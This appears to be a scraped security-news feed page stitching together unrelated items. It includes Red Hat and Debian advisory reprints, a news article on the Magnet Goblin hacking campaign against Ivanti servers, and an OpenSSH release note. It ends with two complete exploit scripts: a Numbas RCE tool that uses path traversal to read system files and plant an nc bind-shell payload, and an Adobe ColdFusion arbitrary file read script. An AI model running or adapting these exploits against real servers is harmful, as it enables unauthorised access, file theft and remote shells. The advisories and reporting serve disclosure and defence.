Red Hat Security Advisory 2024-1248-03 - An update for kernel is now available for Red Hat Enterprise Linux 9. Issues addressed include null pointer, out of bounds access, out of bounds read, out of bounds write, privilege escalation, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1248.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security update  
Advisory ID:        RHSA-2024:1248-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1248  
Issue date:         2024-03-12  
Revision:           03  
CVE Names:          CVE-2023-4244  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: inactive elements in nft_pipapo_walk (CVE-2023-6817)

* kernel: netfilter: use-after-free in nft_trans_gc_catchall_sync leads to privilege escalation (CVE-2024-0193)

* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)

* kernel: Use-after-free in nft_verdict_dump due to a race between set GC and transaction (CVE-2023-4244)

* kernel: A heap out-of-bounds write when function perf_read_group is called and sibling_list is smaller than its child's sibling_list (CVE-2023-5717)

* kernel: NULL pointer dereference in nvmet_tcp_build_iovec (CVE-2023-6356)

* kernel: NULL pointer dereference in nvmet_tcp_execute_request (CVE-2023-6535)

* kernel: NULL pointer dereference in __nvmet_req_complete (CVE-2023-6536)

* kernel: Out-Of-Bounds Read vulnerability in smbCalcSize (CVE-2023-6606)

* kernel: OOB Access in smb2_dump_detail (CVE-2023-6610)

* kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (CVE-2023-51042)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-4244

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2235306  
https://bugzilla.redhat.com/show_bug.cgi?id=2246945  
https://bugzilla.redhat.com/show_bug.cgi?id=2253611  
https://bugzilla.redhat.com/show_bug.cgi?id=2253614  
https://bugzilla.redhat.com/show_bug.cgi?id=2253908  
https://bugzilla.redhat.com/show_bug.cgi?id=2254052  
https://bugzilla.redhat.com/show_bug.cgi?id=2254053  
https://bugzilla.redhat.com/show_bug.cgi?id=2254054  
https://bugzilla.redhat.com/show_bug.cgi?id=2255139  
https://bugzilla.redhat.com/show_bug.cgi?id=2255653  
https://bugzilla.redhat.com/show_bug.cgi?id=2259866

Red Hat Security Advisory 2024-1248-03

Red Hat Security Advisory 2024-1244-03 - An update for rhc-worker-script is now available for Red Hat Enterprise Linux 7. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1244.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: rhc-worker-script security updateAdvisory ID:        RHSA-2024:1244-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1244Issue date:         2024-03-11Revision:           03CVE Names:          CVE-2023-39326====================================================================Summary: An update for rhc-worker-script is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The rhc-worker-script packages provide Remote Host Configuration (rhc) worker for executing an interpreted programming language script on hosts managed by Red Hat Insights.Security Fix(es):* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-39326References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2253330

Red Hat Security Advisory 2024-1244-03

Red Hat Security Advisory 2024-1241-03 - An update for postgresql is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1241.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql security updateAdvisory ID:        RHSA-2024:1241-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1241Issue date:         2024-03-11Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for postgresql is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-1241-03

Red Hat Security Advisory 2024-1240-03 - An update for postgresql is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1240.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql security updateAdvisory ID:        RHSA-2024:1240-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1240Issue date:         2024-03-11Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for postgresql is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-1240-03

**According to the CVSS metric, user interaction is required (UI:R). What interaction would the user have to do?**

Exploitation of the vulnerability requires a user to modify a custom compliance script on the device after it is written to temporary storage and before execution of the script finishes.

CVE-2024-26201: Microsoft Intune Linux Agent Elevation of Privilege Vulnerability

By Deeba Ahmed
Patch Now! One-Day Vulnerabilities Exploited by Magnet Goblin to Deliver Linux Malware!
This is a post from HackRead.com Read the original post: Magnet Goblin Hackers Using Ivanti Flaws to Deploy Linux Malware

Hackers exploit unpatched Ivanti vulnerabilities to deploy malware on Linux systems. Magnet Goblin targets businesses using outdated software. Patch immediately and implement strong security measures to protect against these attacks.

Cybersecurity researchers at Check Point are warning of a malicious campaign targeting one-day vulnerabilities in Ivanti and other security software products, potentially impacting a wide range of organizations.

The culprit behind this campaign is a financially motivated hacker group known as Magnet Goblin. This group has been active since January 2022 and specializes in leveraging newly disclosed vulnerabilities, targeting public-facing servers and edge devices.

According to Check Point’s research, Magnet Goblin is using one-day security vulnerabilities to breach edge devices and public-facing services and deploy custom malware on Linux systems. For your information, after zero-day vulnerabilities are disclosed publicly and patches are released, they are referred to as one-day vulnerabilities.

The attackers exploit unpatched servers like Ivanti Connect Secure VPN, Magento, Qlik Sense, and possibly Apache ActiveMQ to deploy a cross-platform remote access trojan (RAT) called Nerbian RAT, first documented by Proofpoint in 2022. It also utilized Nerbian RAT’s simplified variant, MiniNerbian, which allows arbitrary command execution from a C2 server. 

“NerbianRAT and MiniNerbian… these tools have operated under the radar as they mostly reside on edge devices. This is part of an ongoing trend for threat actors to target areas which until now have been left unprotected,” researchers noted.

NerbianRAT is downloaded from compromised systems with critical Ivanti Connect Secure flaws. While researching, CheckPoint discovered a 1-day vulnerability infection that led to the download of the NerbianRAT Linux variant.

The variant was used to execute various malicious activities on compromised systems, including modifying connection intervals, work time settings, and updating configuration variables.

Magnet Goblin leveraged CVE-2023-46805, CVE-2024-21887, CVE-2024-21888, and CVE-2024-21893 in Ivanti VPNs, CVE-2022-24086 in Magento, and CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365 in Qlik Sense.

They used a JavaScript credential stealer called Warpwire and the open-source tunnelling tool Ligolo to exploit these vulnerabilities. Warpwire stealer is linked to mass Ivanti vulnerability exploitation and was used in a 2022 Magento server attack. In addition, they used remote monitoring tools ScreenConnect and AnyDesk, targeting Qlik Sense and Apache ActiveMQ.

It is worth noting that Ivanti issued a public advisory in January for CVE-2024-21887, a command injection vulnerability, urging users to patch their systems against wild exploitations. However, Check Point found that Magnet Goblin exploitations occurred within a day of patch issuance, targeting systems not yet patched with available fixed updates.

Compromised Magento servers used in Magnet Goblin campaigns (Screenshot: Checkpoint)

John Gallagher, Vice President of Viakoo Labs at Viakoo commented on the findings stating, “It’s clear that Magnet Goblin is taking the easy route; using recently disclosed vulnerabilities to exploit poorly defended systems. With many edge and IoT devices and applications there is a lag time between when a vulnerability is disclosed and when a patch is available…and then another lag time between when the patch is released and when it is implemented.”

“Often the teams managing edge and IoT systems are outside of IT and may have different priorities or sense of urgency when it comes to patching. One can expect that one-day threats will be a major security issue, as the speed of AI can accelerate these specific types of threats. Until the speed of delivery by threat actors is matched by the speed of response by defenders this will be an ongoing security risk.”

Organisations of all sizes relying on Ivanti software for endpoint management and security are at potential risk. This includes companies in various sectors that utilize Ivanti to safeguard their critical infrastructure.

Therefore, patching Ivanti software is necessary to prevent exploitation along with increased monitoring, and adopting a layered security approach, including implementing Endpoint Detection and Response (EDR) solutions to strengthen the overall security of the network and devices.

1.  New Linux Malware Alert: ‘Spinning YARN’ Hits Docker
2.  Linux Malware “Migo” Exploits Redis for Cryptojacking
3.  Bifrost RAT Targets Linux Devices, Mimics VMware Domain
4.  Crypto Stealing PyPI Malware Hits Both Windows and Linux Users
5.  Mirai-based NoaBot Botnet Targeting Linux Systems with Cryptominer

Magnet Goblin Hackers Using Ivanti Flaws to Deploy Linux Malware

Debian Linux Security Advisory 5638-1 - It was discovered that the uv_getaddrinfo() function in libuv, an asynchronous event notification library, incorrectly truncated certain hostnames, which may result in bypass of security measures on internal APIs or SSRF attacks.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5638-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoMarch 10, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libuv1CVE ID         : CVE-2024-24806Debian Bug     : 1063484It was discovered that the uv_getaddrinfo() function in libuv, anasynchronous event notification library, incorrectly truncated certainhostnames, which may result in bypass of security measures on internalAPIs or SSRF attacks.For the oldstable distribution (bullseye), this problem has been fixedin version 1.40.0-2+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.44.2-1+deb12u1.We recommend that you upgrade your libuv1 packages.For the detailed security status of libuv1 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libuv1Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmXtrrFfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TOBw//UDY7qqzhavYjzvVxQ6ka9PGfBLJcRXhMjpwH5JxR6T0KOqCQkasoXCxmNTSzczr0zrtU4Hdtv6tb/E5QfemTpdEfMOtuuKxhQ3jrQNjnqtfDD5ouomrckxMcPtB3SsJ0e1BV97ORDEqrym39VQTIaVgxdZwXU5/mcqaboZx8uxv8XjaDURhAU1eYz5PDno6bTg/zL7bSSugTnxSPHwokv4FICxaG8rR6y6drbI7hndsx+LL+sXs426O8xDzro+deanl3i9kdXxQujhTxJA+7vUTeaCl8rLFs7kOyNxDbCVADYc+Cc0h8Z0xnv/xNDYkIMprGcUx2QgW9mwfDgKGxDVtltPwb6oIBsKzrYBF/gVUqM5aym3VquS8n+lL7+uA0ZHKMxeQRrCtHCIoDUAhjVarQPqbxIX92tftSIRHU7e8Qfmyo7PdbPs9UC4zUUwIwQ6UtRR8OWIKE8IFa+BRxL2/3KCDjDvpK60VUfanRqdF7zcvifFQMw9mqJ/s/IIY6Unhvk9/6QSKrNiaLnFBOVBZ4E4A5OU6W1KAKvixlH8bmv0XCgrlDr2fx/7+Xn8wNA86qPAd9/t6DAVzyjdlis+P6LYzAfrAguWQQS0xkDW+5OQqV3wyKvK1m9PRJK4vfmiX5kw+VclGbJM4ToaKOLbSlns/QNhHuRw2RDem0/+s==ai3N-----END PGP SIGNATURE-----

Debian Security Advisory 5638-1

This is a Linux/portable port of OpenBSD's excellent OpenSSH. OpenSSH is based on the last free version of Tatu Ylonen's SSH with all patent-encumbered algorithms removed, all known security bugs fixed, new features reintroduced, and many other clean-ups.

OpenSSH 9.7p1

Numbas versions prior to 7.3 suffer from a remote code execution vulnerability.

    # Exploit Title: Numbas < v7.3 - Remote Code Execution# Google Dork: N/A# Date: March 7th, 2024# Exploit Author: Matheus Boschetti# Vendor Homepage: https://www.numbas.org.uk/# Software Link: https://github.com/numbas/Numbas# Version: 7.2 and below# Tested on: Linux# CVE: CVE-2024-27612import sys, requests, re, argparse, subprocess, timefrom bs4 import BeautifulSoups = requests.session()def getCSRF(target):    url = f"http://{target}/"    req = s.get(url)    soup = BeautifulSoup(req.text, 'html.parser')    csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']    return csrfmiddlewaretokendef createTheme(target):    # Format request    csrfmiddlewaretoken = getCSRF(target)    theme = 'ExampleTheme'    boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1'    data = (        f'--{boundary}\r\n'        'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n'        '\r\n'        f'{csrfmiddlewaretoken}\r\n'        f'--{boundary}\r\n'        'Content-Disposition: form-data; name="name"\r\n'        '\r\n'        f'{theme}\r\n'        f'--{boundary}--\r\n'    )    headers = {'Content-Type': f'multipart/form-data; boundary={boundary}',               'User-Agent': 'Mozilla/5.0',               'Accept': '*/*',               'Connection': 'close'}    # Create theme and return its ID    req = s.post(f"http://{target}/theme/new/", headers=headers, data=data)    redir = req.url    split = redir.split('/')    id = split[4]    print(f"\t[i] Theme created with ID {id}")    return iddef login(target, user, passwd):    print("\n[i] Attempting to login...")    csrfmiddlewaretoken = getCSRF(target)    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,            'username': user,            'password': passwd,            'next': '/'}        # Login    login = s.post(f"http://{target}/login/", data=data, allow_redirects=True)    res = login.text    if("Logged in as" not in res):        print("\n\n[!] Login failed!")        sys.exit(-1)    # Check if logged and fetch ID    usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res)    if usermatch:        user = usermatch.group(1)        idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res)        if idmatch:            id = idmatch.group(1)            print(f"\t[+] Logged in as \"{user}\" with ID {id}")def checkVuln(url):    print("[i] Checking if target is vulnerable...")    # Attempt to read files    themeID = createTheme(url)    target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.."    hname = s.get(f"{target}/etc/hostname")    ver = s.get(f"{target}/etc/issue")    hnamesoup = BeautifulSoup(hname.text, 'html.parser')    versoup = BeautifulSoup(ver.text, 'html.parser')    hostname = hnamesoup.find('textarea').get_text().strip()    version = versoup.find('textarea').get_text().strip()    if len(hostname) < 1:        print("\n\n[!] Something went wrong - target might not be vulnerable.")        sys.exit(-1)    print(f"\n[+] Target \"{hostname}\" is vulnerable!")    print(f"\t[i] Running: \"{version}\"")    # Cleanup - delete theme    print(f"\t\t[i] Cleanup: deleting theme {themeID}...")    target = f"http://{url}/themes/{themeID}/delete"    csrfmiddlewaretoken = getCSRF(url)    data = {'csrfmiddlewaretoken':csrfmiddlewaretoken}    s.post(target, data=data)def replaceInit(target):    # Overwrite __init__.py with arbitrary code    rport = '8443'    payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])"    csrfmiddlewaretoken = getCSRF(target)    filename = '../../../../numbas_editor/numbas/__init__.py'    themeID = createTheme(target)    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,            'source': payload,            'filename': filename}    print("[i] Delivering payload...")    # Retry 5 times in case something goes wrong...    for attempt in range(5):        try:            s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10)        except Exception as e:            pass        # Establish connection to bind shell    time.sleep(2)    print(f"\t[+] Payload delivered, establishing connection...\n")    if ":" in target:        split = target.split(":")        ip = split[0]    else:        ip = str(target)    subprocess.Popen(["nc", "-n", ip, rport])    while True:        passdef main():    parser = argparse.ArgumentParser()    if len(sys.argv) <= 1:        print("\n[!] No option provided!")        print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n")        print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty")        sys.exit(-1)    group = parser.add_mutually_exclusive_group(required=True)    group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit')    parser.add_argument('--target', help='Target IP:PORT')    parser.add_argument('--user', help='Username to authenticate')    parser.add_argument('--passwd', help='Password to authenticate')    args = parser.parse_args()    action = args.action    target = args.target    user = args.user    passwd = args.passwd    print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-")        if action == 'check':        login(target, user, passwd)        checkVuln(target)    elif action == 'exploit':        login(target, user, passwd)        replaceInit(target)    else:        sys.exit(-1)if __name__ == "__main__":    main()

Numbas Remote Code Execution

Adobe ColdFusion versions 2018,15 and below and versions 2021,5 and below suffer from an arbitrary file read vulnerability.

# Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360# Google Dork: [not]# Date: [12/28/2023]# Exploit Author: [Youssef Muhammad]# Vendor Homepage: [https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html]# Software Link: [https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0]# Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 andearlier]# Tested on: [Windows, Linux]# CVE : [CVE-2023-26360]import sysimport requestsimport jsonBANNER = """   ██████ ██    ██ ███████       ██████   ██████  ██████  ██████        ██████   ██████  ██████   ██████   ██████    ██      ██    ██ ██                 ██ ██  ████      ██      ██            ██ ██            ██ ██       ██  ████   ██      ██    ██ █████   █████  █████  ██ ██ ██  █████   █████  █████  █████  ███████   █████  ███████  ██ ██ ██   ██       ██  ██  ██            ██      ████  ██ ██           ██       ██      ██    ██      ██ ██    ██ ████  ██    ██████   ████   ███████       ███████  ██████  ███████ ██████        ███████  ██████  ██████   ██████   ██████                                                                                                                                                                                                                                       """RED_COLOR = "\033[91m"GREEN_COLOR = "\032[42m"RESET_COLOR = "\033[0m"def print_banner():    print(RED_COLOR + BANNER + "                  Developed by SecureLayer7" + RESET_COLOR)    return 0def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None):    if not endpoint.endswith('.cfc'):        endpoint += '.cfc'    if target_file.endswith('.cfc'):        raise ValueError('The TARGET_FILE must not point to a .cfc')    targeted_file = f"a/{target_file}"    json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []})    vars_get = {'method': 'test', '_cfclient': 'true'}    uri = f'{host}{endpoint}'    response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None)    file_data = None    splatter = '</TD></TD></TD></TH></TH></TH>'    if response.status_code in [404, 500] and splatter in response.text:        file_data = response.text.split(splatter, 1)[0]    if file_data is None:        raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')    print(file_data)    # Save the output to a file    output_file_name = 'output.txt'    with open(output_file_name, 'w') as output_file:        output_file.write(file_data)        print(f"The output saved to {output_file_name}")if __name__ == "__main__":    if not 3 <= len(sys.argv) <= 5:        print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")        sys.exit(1)    print_banner()    host = sys.argv[1]    target_file = sys.argv[2]    endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc"    proxy_url = sys.argv[4] if len(sys.argv) > 4 else None    try:        run_exploit(host, target_file, endpoint, proxy_url)    except Exception as e:        print(f"Error: {e}")

Tag

#linux